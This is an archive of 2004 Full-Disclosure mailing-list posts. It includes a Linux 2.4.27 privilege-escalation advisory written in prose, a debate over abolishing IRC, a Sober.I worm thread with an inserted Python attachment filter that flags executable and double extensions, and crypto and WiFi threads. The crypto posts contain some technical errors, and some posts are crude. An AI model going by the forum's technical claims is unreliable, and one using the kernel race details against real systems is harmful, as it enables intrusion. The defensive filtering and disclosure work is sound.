 Rafel Ivgi, The-Insider wrote:
 
 Firefox is not integrated to the OS, because it doesn't have an OS.
 It's just a trimmed Mozilla for windows..
 However Mozilla in Linux is integrated at some level...so 
 they are just 
 the same as I.E.
 
 
 Rafel Ivgi, The-Insider
 Security Consultant
 Malicious Code Research Center (MCRC)
 Finjan Software LTD
 E-mail: [EMAIL PROTECTED]
 -
 Prevention is the best cure!
 - Original Message -
 From: john morris [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Sunday, November 14, 2004 3:34 PM
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
   
 
 Firefox avoids several fundamental design flaws of IE, in that:
 
 

[Full-Disclosure] Addendum, recent Linux = 2.4.27 vulnerabilities

2004-11-19 Thread Paul Starzetz


Hi,

while looking at the changelog for 2.4.28, I found that a bug I 
independently came across some days ago has been fixed in that release:

David S. Miller:
  o [AF_UNIX]: Serialize dgram read using semaphore just like stream

That fixes missing serialization in unix_dgram_recvmsg().

I was slightly surprised reading the 2.4.27 code, and I strongly believe 
that the flaw is fully exploitable to gain elevated privileges. 

There is a subtle race condition finally permitting a non-root user to 
increment (up to 256 times) any arbitrary location(s) in kernel space.

The condition is not easy to exploit since an attacker must trick 
kmalloc() to sleep on allocation of a special chunk of memory and then 
convince the scheduler to execute another thread. But it is feasible.

Conclusion: update as quickly as possible to 2.4.28.

-- 
Paul Starzetz
iSEC Security Research
http://isec.pl/



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Georgi Guninski
dear j0e,

all i wanted to say is that there are minorities in the real world, who don't
load a browser or even graphics and they don't need anyone to let them.

i believe these minorities in real world can do more things than the
windoze lusers (whose main purpose is to be free shell providers), while
enjoying all the fun that the windoze lusers may have.

-- 
Pro-Choice
Let j03 choose if he even wants a browser loaded - make b1l1 a blowjob. thanks!



On Fri, Nov 19, 2004 at 11:09:28AM -0500, joe wrote:
 Georgi, you obviously aren't in touch with the real world if you don't
 realize which OS and browser comprise a vast majority of the market. That

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Jeff Donahue
That's because the Internet is free and no one can control what survives on 
it. What survives isn't what is *ethical* but what is *useful*. And IRC is 
very useful for some people, so it's here to stay.

The problem is not IRC; the problem is the misuse some people make of it. We 
cannot make knives disappear, because they are useful; instead, we must get 
rid of people who use knives to kill.

- Original Message - 
From: Danny [EMAIL PROTECTED]
To: Mailing List - Full-Disclosure [EMAIL PROTECTED]
Sent: Friday, November 19, 2004 2:40 PM
Subject: [Full-Disclosure] Why is IRC still around?


Well, it sure does help the anti-virus (anti-malware) and security
consulting business, but besides that... is it not safe to say that:
1) A hell of a lot of viruses/worms/trojans use IRC to wreak further 
havoc?
2) A considerable amount of script kiddies originate and grow through 
IRC?
3) A wee bit of software piracy occurs?
4) That many organized DoS attacks through PC zombies are initiated 
through IRC?
5) The anonymity of the whole thing helps to foster all the illegal
and malicious activity that occurs?
The list goes on and on...

Sorry to offend those that use IRC legitimately (LOL - find something
else to chat with your buddies), but why the hell are we not pushing
to sunset IRC?
What would IT be like today without IRC (or the like)? Am I narrow
minded to say that it would be a much safer place?
...D
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Sober.I worm is here

2004-11-19 Thread Todd Towles
It arrives as .doc, .txt and .word? 

Where are you seeing that?

It can't be very dangerous as a TEXT file. As far as I know it uses the
normal double-extension tricks. Any good email filter should pick
this up and you should be fine. Anyone who just clicks on random
attachments in their e-mail and doesn't have anti-virus should get
infected. 

At least, they are letting someone that knows something use your
computer for something..lol j/k

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Danny
 Sent: Friday, November 19, 2004 11:07 AM
 To: KF_lists
 Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Sober.I worm is here
 
 On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists 
 [EMAIL PROTECTED] wrote:
  can you define medium sized epidemic?
  Any new features / functionality?
 
 Not too much, except for the fact that it also arrives with 
 the following attachment extensions: .doc, .txt, and .word
 
 Which are not typically blocked by layer 7 aware firewalls. 
 Whereas, the biggies .scr, .pif, .exe, .com, .bat, etc., are 
 usually blocked.
 
 ...D
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
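An attachment screen for the two evasions this thread turns on, written as an added example (not the worm's code and not from any filter product): the double-extension trick Todd mentions, and an executable delivered under a .txt or .doc name, which is the answer to how a "text file" can infect anyone. The extension sets come from the posts; the sample message is constructed, and treating the non-standard .word as unknown rather than trusted is my assumption.

```python
"""Screen e-mail attachments for the evasions discussed in the Sober.I
thread: double extensions, and executables hiding behind a benign
extension.  Added example; the sample message below is constructed."""
from email import message_from_string
from email.message import Message

# Extensions the thread lists as usually blocked by layer-7 firewalls.
EXECUTABLE_EXTS = {"scr", "pif", "exe", "com", "bat"}
# Document extensions the thread says slip through.  ".word" is not a
# real Office type, so it falls to "review" (my assumption, not the thread's).
DOCUMENT_EXTS = {"doc", "txt"}
PE_MAGIC = b"MZ"  # header of every DOS/Windows executable


def classify_name(filename: str) -> str:
    """Return 'block', 'review' or 'allow' from the file name alone."""
    parts = [p.strip().lower() for p in filename.split(".") if p.strip()]
    if len(parts) < 2:
        return "review"            # no extension at all: judge by content
    exts = parts[1:]
    if exts[-1] in EXECUTABLE_EXTS:
        return "block"             # the real (last) extension is executable
    if any(e in EXECUTABLE_EXTS for e in exts):
        return "review"            # executable extension buried mid-name
    if len(exts) > 1:
        return "review"            # any other double extension
    return "allow" if exts[-1] in DOCUMENT_EXTS else "review"


def classify_part(part: Message) -> str:
    """Combine the name verdict with a content check: a .txt or .doc whose
    payload starts with an MZ header is an executable no matter what the
    name or the declared Content-Type claims."""
    verdict = classify_name(part.get_filename() or "")
    payload = part.get_payload(decode=True) or b""
    if payload[:2] == PE_MAGIC:
        return "block"
    return verdict


def screen_message(raw: str) -> dict:
    """Map each named attachment in a raw RFC 822 message to its verdict."""
    msg = message_from_string(raw)
    verdicts = {}
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        name = part.get_filename()
        if name:
            verdicts[name] = classify_part(part)
    return verdicts


# Constructed sample: one renamed executable (first 12 bytes of a PE
# header, base64), one double-extension name, one genuine text file.
SAMPLE = """From: sender@example.invalid
To: victim@example.invalid
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/plain

see attached
--B
Content-Type: text/plain; name="readme.txt"
Content-Disposition: attachment; filename="readme.txt"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA
--B
Content-Type: application/octet-stream; name="invoice.doc.pif"
Content-Disposition: attachment; filename="invoice.doc.pif"

junk
--B
Content-Type: text/plain; name="notes.txt"
Content-Disposition: attachment; filename="notes.txt"

just text
--B--
"""

if __name__ == "__main__":
    for name, verdict in screen_message(SAMPLE).items():
        print(f"{name}: {verdict}")
```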


Re: [Full-Disclosure] Time Expiry Alogorithm??

2004-11-19 Thread Anders Langworthy
Pavel Kankovsky wrote:
If a certain deterministic computation (e.g. decryption) can be made in
time T, then it can be made in any time T' > T.
This is true for breaking a cipher by brute force, but it doesn't 
account for (stop looking at me) somehow incorporating a timestamp into 
the encryption scheme to prevent 'legit' decryption after a certain time.

Note that what Gautam wants, namely a time-expiring cipher, cannot exist 
without some third party to provide validation and a timebase.  This is 
what Kerberos does.  Otherwise I can just set the clock back on my 
system and decrypt your damn message anyway.

On the other hand, the power of hardware as well as the knowledge of
cryptanalysis increases as the time passes, ergo any cipher is going to
expire...in the sense someone will become able to break it and recover 
the plaintext without the (a priori) knowledge of the encryption key.
I'm going to disagree as politely as possible.  As an example, using RSA 
with 1024 bit keys allows for around 10^150 possible primes.  Compare 
this to the 10^70 some atoms in the known universe to see how 
disgustingly big that number is.  Cracking this encryption scheme by 
searching the keyspace is laughable.  Increase the keysize even a little 
bit from that and there are arguments that the universe doesn't even 
hold enough *energy* to allow for searching that kind of keyspace.

Now the other possibility: That somebody discovers a better way to 
factor primes (please don tinfoil hats before replying to tell me that 
the NSA has already done this, in Area 51, with help from Elvis). 
Mathematically, this is a very remote possibility, as factoring primes 
is probably an NP problem, and P is probably not NP.  Neither of these 
has been proven, however.

Even allowing for the minuscule possibility that there is a shortcut to 
factoring primes, that doesn't necessarily mean that factoring huge 
primes will be an easy task.  Using larger keys will still provide a 
measure of security.

//Anders
The classic crypto primer:
http://www.cyphernet.org/cyphernomicon/chapter2/2.5.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Sober.I worm is here

2004-11-19 Thread Bowes, Ronald (EST)
How does it infect somebody if it's using a .txt file?

Ron Bowes
Information Protection Centre
Government Of Manitoba
204-945-1594

-Original Message-
From: Danny [mailto:[EMAIL PROTECTED] 
Sent: Friday, November 19, 2004 11:07 AM
To: KF_lists
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Sober.I worm is here

On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists [EMAIL PROTECTED] wrote:
 can you define medium sized epidemic?
 Any new features / functionality?

Not too much, except for the fact that it also arrives with the
following attachment extensions: .doc, .txt, and .word

Which are not typically blocked by layer 7 aware firewalls. Whereas,
the biggies .scr, .pif, .exe, .com, .bat, etc., are usually blocked.

...D

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Todd Towles
 Microsoft integration: You remove the application that plays 
 MPEG movies from a system that has never needed to play MPEG 
 movies, and never will need to - and your system won't boot anymore.

Example -  Anyone with XP, do a search for mplayer2.exe? What is this
you ask? It is media player 6.4 =)

You only think you upgraded to Media player 10..lol

-Todd

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



RE: [Full-Disclosure] WiFi question

2004-11-19 Thread Todd Towles
It shouldn't take a wireless expert to tell you that...he should try it.

I pick up all types of weird stuff all the time in Kismet..and it looks
like something..but I know it isn't..the SSID is A^B^C^B^D^S^G, or in
other words, trash. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Paul Schmehl
 Sent: Friday, November 19, 2004 10:51 AM
 To: Lachniet, Mark
 Cc: [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] WiFi question
 
 --On Thursday, November 18, 2004 09:32:27 AM -0600 Paul 
 Schmehl [EMAIL PROTECTED] wrote:
 
  --On Wednesday, November 17, 2004 12:41:44 PM -0500 Lachniet, Mark
  [EMAIL PROTECTED] wrote:
 
  Could also be RF interference.  One of my coworkers tracked down a 
  particularly interesting problem with motion sensor lights.  Turns 
  out the motion sensors worked at the 240mhz range, which has 
  resonance at 2.4ghz, or something like that.  Hence every time the 
  motion sensor worked, it would spew what the wardriving 
 (site survey) 
  apps thought was a zillion different access points with widely 
  varying MAC addresses.  I would have thought it was a 
 FAKEAP program 
  also.  I would assume the same could happen with other 
 interference.  
  Having a common SSID would seem to indicate this is not 
 the problem, but just thought I'd mention it.
 
  Thanks for a particularly interesting and potentially useful bit of 
  information, Mark.
 
 After forwarding this to our wireless expert, he responded 
 with this (which he has authorized me to forward to the list.)
 
 I find it hard to believe that this is possible.  2.4Ghz is 
 the 9th harmonic.  By the time you get to the 4th harmonic of 
 a signal, even in very very noisy radiators, the strength of 
 the harmonic component of the signal is extremely minute.  
 And, given the fact that one of those sensors (which most 
 likely does *not* truly operate in the 240MHz portion of the
 spectrum) will have a very low output (Part 15 device), the 
 10th harmonic of that signal will be undetectable as it will 
 be at or below the level of background noise.
 
 Finally, if a device managed to get past all of the 
 improbabilities above, the chances of it *accidentally* 
 creating a signal that looked like an
 802.11 beacon packet, complete with preamble, header, etc is 
 so off the charts as to be laughable.
 
 One other thing...  If that device truly was operating at 
 240MHz, then the first harmonic would be 480MHz.  I'm pretty 
 sure that frequency lies in the public service bands (i.e. 
 fire/police).  If not, it's very close.  Given that and the 
 fact that the first harmonic would be much stronger than the 
 9th harmonic, I'm pretty sure someone in those bands would 
 have complained loudly to the FCC as they don't take 
 interference issues in those bands lightly.
 
 Paul Schmehl ([EMAIL PROTECTED])
 Adjunct Information Security Officer
 The University of Texas at Dallas
 AVIEN Founding Member
 http://www.utdallas.edu
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: Why is IRC still around?

2004-11-19 Thread class 101
 Sorry to offend those that use IRC legitimately (LOL -  find something
 else to chat with your buddies)

Join #n3ws at EFnet, that's legit and not to speak with your buddies, yep,
you will fall asleep less stupid tonight ...

class101

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread shrek
Even better idea: Get sunset internet!

/me just solved problems 1-5


On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote:
 Well, it sure does help the anti-virus (anti-malware) and security
 consulting business, but besides that... is it not safe to say that:
 
 1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?
 2) A considerable amount of script kiddies originate and grow through IRC?
 3) A wee bit of software piracy occurs?
 4) That many organized DoS attacks through PC zombies are initiated through 
 IRC?
 5) The anonymity of the whole thing helps to foster all the illegal
 and malicious activity that occurs?
 The list goes on and on...
 
 Sorry to offend those that use IRC legitimately (LOL - find something
 else to chat with your buddies), but why the hell are we not pushing
 to sunset IRC?
 
 What would IT be like today without IRC (or the like)? Am I narrow
 minded to say that it would be a much safer place?
 
 ...D
 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Airport x-ray software creating images of phantom weapons?

2004-11-19 Thread Valdis . Kletnieks
On Thu, 18 Nov 2004 10:46:50 GMT, Joel Merrick said:

 Maybe it'll get leaked on the net and we'll find out they use a hard
 coded DES key that I could crack with my casio watch ;)

No, ROT13 is way leet strong crypto as long as nobody knows it, as
Sklyarov found out... ;)




Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Mister Coffee
Danny wrote:
Well, it sure does help the anti-virus (anti-malware) and security
consulting business, but besides that... is it not safe to say that:
1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?

And?  There are a hell of a lot of normal users on IRC too who don't 
wreak havoc.  A lot of spam comes in email.  Does that make email bad?

2) A considerable amount of script kiddies originate and grow through IRC?

And AIM, ICQ, Jabber, web-forums, mailing lists, etc.  IRC is one medium 
amongst many.

3) A wee bit of software piracy occurs?
Some, perhaps.  But unlike, say BitTorrent or Kazaa, IRC's primary role 
is communication rather than file transfer.  You could make the same 
argument for ANY of the IM clients that support file transfer.

4) That many organized DoS attacks through PC zombies are initiated through IRC?

Many do.  Yes.  But many also originate through other media, and, again, 
 it's not the medium's fault that people use it for nefarious purposes. 
 Hitmen get calls on their cell phones.  Should we eliminate cell 
phones to stop the hitmen?

5) The anonymity of the whole thing helps to foster all the illegal
and malicious activity that occurs?
The list goes on and on...
Anonymity is not a bad thing in many, many respects.  And the list of 
legitimate uses goes on and on as well.

Sorry to offend those that use IRC legitimately (LOL - find something
else to chat with your buddies), but why the hell are we not pushing
to sunset IRC?
No offense.  But the arguments aren't especially strong.  We're not 
pushing to sunset the IRC protocol because there are still thousands and 
thousands of -legitimate- users in the world.  Unlike most IM systems, 
the IRC nets are completely independent.  There are some serious 
advantages to that.

What would IT be like today without IRC (or the like)? Am I narrow
minded to say that it would be a much safer place?
Yes?
IRC is a protocol.  A tool like any other.  Last I looked there were 
still hundreds to thousands of IRC users at any given time who were 
there just to hang out and BS with their friends.   It's still a valid 
community if you will, in spite of the nefarious uses other people 
have put it to.

If you sunset something like IRC, the 3v1L [EMAIL PROTECTED] will just move their 
bots and trojans somewhere else.

...D
Cheers,
L4J
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread james edwards
 Sorry to offend those that use IRC legitimately (LOL - find something
 else to chat with your buddies), but why the hell are we not pushing
 to sunset IRC?

It is not IRC that is the problem, it is the people on IRC that cause
problems.
Guns don't kill people all by themselves; people kill people.




 What would IT be like today without IRC (or the like)? Am I narrow
 minded to say that it would be a much safer place?

 ...D

I would be lost w/o freenode.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Bowes, Ronald (EST)
How exactly do you propose to accomplish this?  IRC is an open protocol and
there are many open clients and open servers which can run on any port, and
run encrypted with SSL.  

So do you intend to scan every computer on the Internet on port 6667, and
shut down every server found running, then move on to random ports that
zombies probably use, and start attacking sites that provide open source
clients that use an open protocol?

Your suggestion makes no sense, and it's something that's impossible to
implement.  Why not just make knives illegal?  I mean, they're frequently
used as a weapon, right?


Ron Bowes
Information Protection Centre
Government Of Manitoba


-Original Message-
From: Danny [mailto:[EMAIL PROTECTED] 
Sent: Friday, November 19, 2004 11:40 AM
To: Mailing List - Full-Disclosure
Subject: [Full-Disclosure] Why is IRC still around?

Well, it sure does help the anti-virus (anti-malware) and security
consulting business, but besides that... is it not safe to say that:

1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?
2) A considerable amount of script kiddies originate and grow through IRC?
3) A wee bit of software piracy occurs?
4) That many organized DoS attacks through PC zombies are initiated through
IRC?
5) The anonymity of the whole thing helps to foster all the illegal
and malicious activity that occurs?
The list goes on and on...

Sorry to offend those that use IRC legitimately (LOL - find something
else to chat with your buddies), but why the hell are we not pushing
to sunset IRC?

What would IT be like today without IRC (or the like)? Am I narrow
minded to say that it would be a much safer place?

...D

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread huhu
Danny wrote:
Well, it sure does help the anti-virus (anti-malware) and security
consulting business, but besides that... is it not safe to say that:
?
1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?
email, http, aol users;)?
2) A considerable amount of script kiddies originate and grow through IRC?
and criminals through phones
3) A wee bit of software piracy occurs?
p2p?
4) That many organized DoS attacks through PC zombies are initiated through IRC?
just a control network, could also be (and is) handled through p2p technology
5) The anonymity of the whole thing helps to foster all the illegal
anonymity?;)
and malicious activity that occurs?
The list goes on and on...
Sorry to offend those that use IRC legitimately (LOL - find something
else to chat with your buddies), but why the hell are we not pushing
to sunset IRC?
What would IT be like today without IRC (or the like)? Am I narrow
minded to say that it would be a much safer place?
yes, you are.
...D


Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Jason
Unfortunately IRC is not the problem. Removing IRC will cause the 
systems that use it to leverage another control channel. The people that 
abuse it will use another forum...

The problem is that systems exist that can be mass exploited and used to 
coordinate attacks and that there are people happy to exploit those systems.

You can use any of the following to coordinate the same attacks:
- a web page
- ping
- DNS
- newsgroups
- ftp
- AIM
- Jabber
- P2P
- Email
- blog
...
Danny wrote:
Well, it sure does help the anti-virus (anti-malware) and security
consulting business, but besides that... is it not safe to say that:
1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc?
2) A considerable amount of script kiddies originate and grow through IRC?
3) A wee bit of software piracy occurs?
4) That many organized DoS attacks through PC zombies are initiated through IRC?
5) The anonymity of the whole thing helps to foster all the illegal
and malicious activity that occurs?
The list goes on and on...
Sorry to offend those that use IRC legitimately (LOL - find something
else to chat with your buddies), but why the hell are we not pushing
to sunset IRC?
What would IT be like today without IRC (or the like)? Am I narrow
minded to say that it would be a much safer place?
...D


Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread shrek
Oh, crap s/Get/Why not/

Sorry


On Fri, 19 Nov 2004 12:49:32 -0600, shrek [EMAIL PROTECTED] wrote:
 
 
 Even better idea: Get sunset internet1
 
 /me just solved problems 1-5
 
 On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote:
  Well, it sure does help the anti-virus (anti-malware) and security
  consulting business, but besides that... is it not safe to say that:
 
  1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc?
  2) A considerable amount of script kiddies originate and grow through IRC?
  3) A wee bit of software piracy occurs?
  4) That many organized DoS attacks through PC zombies are initiated through 
  IRC?
  5) The anonymity of the whole thing helps to foster all the illegal
  and malicious activity that occurs?
  The list goes on and on...
 
  Sorry to offend those that use IRC legitimately (LOL - find something
  else to chat with your buddies), but why the hell are we not pushing
  to sunset IRC?
 
  What would IT be like today without IRC (or the like)? Am I narrow
  minded to say that it would be a much safer place?
 
  ...D
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html
 




Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Danny
On Fri, 19 Nov 2004 12:17:09 -0800, Mister Coffee
[EMAIL PROTECTED] wrote:
 Danny wrote:
  Well, it sure does help the anti-virus (anti-malware) and security
  consulting business, but besides that... is it not safe to say that:
 
  1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc?
  
 And?  There are a hell of a lot of normal users on IRC too who don't
 wreck havoc.  A lot of spam comes in email.  Does that make email bad?
 
  2) A considerable amount of script kiddies originate and grow through IRC?
  
 And AIM, ICQ, Jabber, web-forums, mailing lists, etc.  IRC is one medium
 amongst many.
 
  3) A wee bit of software piracy occurs?
 
 Some, perhaps.  But unlike, say BitTorrent or Kazaa, IRC's primary role
 is communication rather than file transfer.  You could make the same
 argument for ANY of the IM clients that support file transfer.
 
  4) That many organized DoS attacks through PC zombies are initiated through 
  IRC?
  
 Many do.  Yes.  But many also originate through other media, and, again,
   it's not the medium's fault that people use it for nefarious purposes.
   Hitmen get calls on their cell phones.  Should we eliminate cell
 phones to stop the hitmen?
 
  5) The anonymity of the whole thing helps to foster all the illegal
  and malicious activity that occurs?
  The list goes on and on...
  
 Anonymity is not a bad thing in many, many, respects.  And the list of
 legitimate uses goes on and on as well.
 
  Sorry to offend those that use IRC legitimately (LOL - find something
  else to chat with your buddies), but why the hell are we not pushing
  to sunset IRC?
  
 No offense.  But the arguments aren't especially strong.  We're not
 pushing to sunset the IRC protocol because there are still thousands and
 thousands of -legitimate- users in the world.  Unlike most IM systems,
 the IRC nets are completely independent.  There are some serious
 advantages to that.
 
  What would IT be like today without IRC (or the like)? Am I narrow
  minded to say that it would be a much safer place?
  
 Yes?
 
 IRC is a protocol.  A tool like any other.  Last I looked there were
 still hundreds to thousands of IRC users at any given time who were
 there just to hang out and BS with their friends.   It's still a valid
 community if you will, in spite of the nefarious uses other people
 have put it to.
 
 If you sunset something like IRC, the 3v1L [EMAIL PROTECTED] will just move 
 their
 bots and trojans somewhere else.

Well said. Thanks for your time.

...D



Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Andrew Farmer
On 19 Nov 2004, at 08:35, Xavier Beaudouin wrote:
Thanks. I thought that it had more meanings :-D
	Given that Firefox is integrated in Linux...
It isn't.

...
Result : Firefox is not integrated in Linux, it is a third party 
software as /bin/bash or whatever that is given as a giveaway on the 
computer...
Even less so. Bash is sometimes used as a component of startup scripts 
(#!/bin/bash...), while Firefox is just a plain old browser.

In fact, I'm not so sure it's even a component of Nautilus. Is this a 
recent change?



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Valdis . Kletnieks
On Fri, 19 Nov 2004 12:40:26 EST, Danny said:

 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc?
 2) A considerable amount of script kiddies originate and grow through IRC?
 3) A wee bit of software piracy occurs?
 4) That many organized DoS attacks through PC zombies are initiated through 
 IRC?
 5) The anonymity of the whole thing helps to foster all the illegal
 and malicious activity that occurs?

And is there *anything* on that list that is in the least bit IRC-specific,
or can any *other* IM system work just as well?

 What would IT be like today without IRC (or the like)? Am I narrow
 minded to say that it would be a much safer place?

Only if you *also* manage to stomp out AIM, and MSN Messenger, and Yahoo,
and Jabber, and...  Because if you don't, they'll just pick up and move
elsewhere.



Re: [Full-Disclosure] Why is IRC still around? (Because anything less would be uncivilized)

2004-11-19 Thread Danny
Well, fellow F-D'ers, thanks to the vast array of intelligence and
experience found on this list, my rant about abolishing IRC has been
proven to be far from a solution.

Maybe I will throw my suggestion in as Feature Request for Internet2. :D

...D



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Michael Rutledge
Wow, I think you have a great point!  To add to the list, Los Angeles
has quite a bit of crime, so I think that it should be removed from
the face of the planet.  Of course, I think some fraud has been
occurring on eBay--remove them also.  Oh, and some Catholic priests
have been in the news for some questionable activities, why keep
them around--Catholicism has been overrated (been around too long),
nuke em.
/sarcasm

IRC is a great communication tool that has grown and evolved over the
years.  There will always be a medium for questionable activities
and illegal acts to propagate regardless of what communication link
you remove.

-Michael

On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote:
 Well, it sure does help the anti-virus (anti-malware) and security
 consulting business, but besides that... is it not safe to say that:
 
 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc?
 2) A considerable amount of script kiddies originate and grow through IRC?
 3) A wee bit of software piracy occurs?
 4) That many organized DoS attacks through PC zombies are initiated through 
 IRC?
 5) The anonymity of the whole thing helps to foster all the illegal
 and malicious activity that occurs?
 The list goes on and on...
 
 Sorry to offend those that use IRC legitimately (LOL - find something
 else to chat with your buddies), but why the hell are we not pushing
 to sunset IRC?
 
 What would IT be like today without IRC (or the like)? Am I narrow
 minded to say that it would be a much safer place?
 
 ...D
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html




Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Valdis . Kletnieks
On Fri, 19 Nov 2004 13:12:31 EST, Crotty, Edward said:
 I'm not a Win based guy (troll?) - Un*x here - and even I was offended by #1.
 
 There is such a thing as runas for Windows.

Yes, but is *the main design* of the system run as a mortal, and use
the 'runas' for those things that need more?

Or is the *main design* We'll just elect the first user as Administrator,
and include 'runas' in case somebody wants to Do It The Right Way?



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread dk
Danny wrote:
Sorry to offend those that use IRC legitimately (LOL - find something
else to chat with your buddies), but why the hell are we not pushing
to sunset IRC?
 

Many people use IRC; and still do. It's a legitimate medium I've used 
since the 80's for its intended purpose. Your abolish idea is, to be 
honest, a bit simplistic don't you think?  Let's just cut through the 
proselytizing and ban this whole Internet thing, that'll stop 'em. :)

What would IT be like today without IRC (or the like)? Am I narrow
minded to say that it would be a much safer place?
 

Path of least resistance. If not IRC another venue would be used.
--
dk


RE: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Poof
Wow, NICE analogy Jeff!

While IRC is here to stay... The future seems more like servers that're only
hosted through big companies/etc as most datacenters are 'forbidding' use of
IRC(Ports 6660-6669, 7000) on their network.

Just a thought.

~

 That's because the Internet is free and no one can control what survives
 on
 it. What survives isn't what is *ethical* but what is *useful*. And IRC is
 very useful for some people, so it's here to stay.
 
 The problem is not IRC; the problem is the misuse some people make of it.
 We
 cannot make knives disappear, because they are useful; instead, we must
 get
 rid of people that use knives to kill.



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread J.A. Terranson

On Fri, 19 Nov 2004, Danny wrote:

 What would IT be like today without IRC (or the like)? Am I narrow
 minded to say that it would be a much safer place?

Narrow minded or not, it's irrelevant.  Sure, the world *might* be a
little teeny bit safer without IRC, but then, the same could be said
about half the readership of this list (Hi Paul!): why not sunset them
as well?

Your argument boils down to the pre-emptive removal of anything that could
conceivably be used in an illegitimate manner - as we have all seen with
gun control, banning the *tool* is not going to stop the violence.  Might
as well ban knives, chewing gum, and techno music..

 ...D

-- 
Yours,

J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

 Civilization is in a tailspin - everything is backwards, everything is
upside down- doctors destroy health, psychiatrists destroy minds, lawyers
destroy justice, the major media destroy information, governments destroy
freedom and religions destroy spirituality - yet it is claimed to be
healthy, just, informed, free and spiritual. We live in a social system
whose community, wealth, love and life is derived from alienation,
poverty, self-hate and medical murder - yet we tell ourselves that it is
biologically and ecologically sustainable.

The Bush plan to screen whole US population for mental illness clearly
indicates that mental illness starts at the top.

Rev Dr Michael Ellner



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Tim
 My mistake; I was referring to the discussion, collaboration, and
 creation, not the spread.

You mentioned DDoS attacks below.  I don't believe that use is a form of
discussion, collaboration, or creation.

 Some say we should, but I am not one of those. My point was to get rid
 of the most well established tool (and easiest to use) for these types
 of activities.

Any tool can be used by anyone for good or evil.  If one knows the
kiddies are all hanging out on IRC, then you can get a lot of good info
about what their new attacks are by loitering on their channels.


 What's the difference? IRC is so well established for the type of
 activity I am referring to.

As it is established for many productive things.  Ever check out
freenode?


 I'll leave the piracy battle for someone else - I just mentioned it as
 a part of the problem.

If you aren't prepared to defend it on this list, better not mention it.
=)


 Sure netcat is an alternative, but which one is easier to use?

Um... netcat, or raw tcp sockets.  I would argue it is easier to write
something that just opens a connection, and listens for commands to come
back, than something that has to speak IRC.  Speaking IRC has its own
advantages, but in the absence of it, it is still trivial to manage a
bot net.

 I thought I would throw out the idea. If you want to call me a troll,
 then so be it, but don't get your panties in a knot over the whole
 thing

Pardon my harsh reply.  It wasn't personal, and is directed only at your
